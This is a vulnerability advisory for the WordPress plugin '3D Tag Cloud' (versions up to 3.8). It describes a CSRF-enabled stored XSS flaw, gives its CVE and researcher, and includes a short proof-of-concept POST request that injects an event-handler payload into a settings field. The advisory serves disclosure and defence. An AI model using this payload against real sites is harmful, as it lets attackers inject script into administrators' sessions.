3D Tag Cloud by Vinoj Cardoza

3D Tag Cloud by Vinoj Cardoza <= 3.8 - Stored XSS via CSRF

LANACOMMONVDB ID: c5598d13-6b72-428c-b5d2-90760646e633

The plugin does not have Cross-Site Request Forgery (CSRF) check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored Cross-Site Scripting (XSS) payloads via a Cross-Site Request Forgery (CSRF) attack.

Proof of Concept

POST /wp-admin/options-general.php?page=wp_3d_tag_cloud_slug HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

frm_width=%22%20onmouseover%3Dalert(/XSS/)%20onload%3D%22&frm_submit=true

References

Source Code: https://wordpress.org/plugins/cardoza-3d-tag-cloud/

CVE: CVE-2022-41990

Attributes

Catgory: WordPress Plugin

Discovered: 2022-09-04

Published: 2022-10-27

Affected Version: <= 3.8

Classification

Type: Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS)

Researcher

Name: István Márton

Email: [email protected]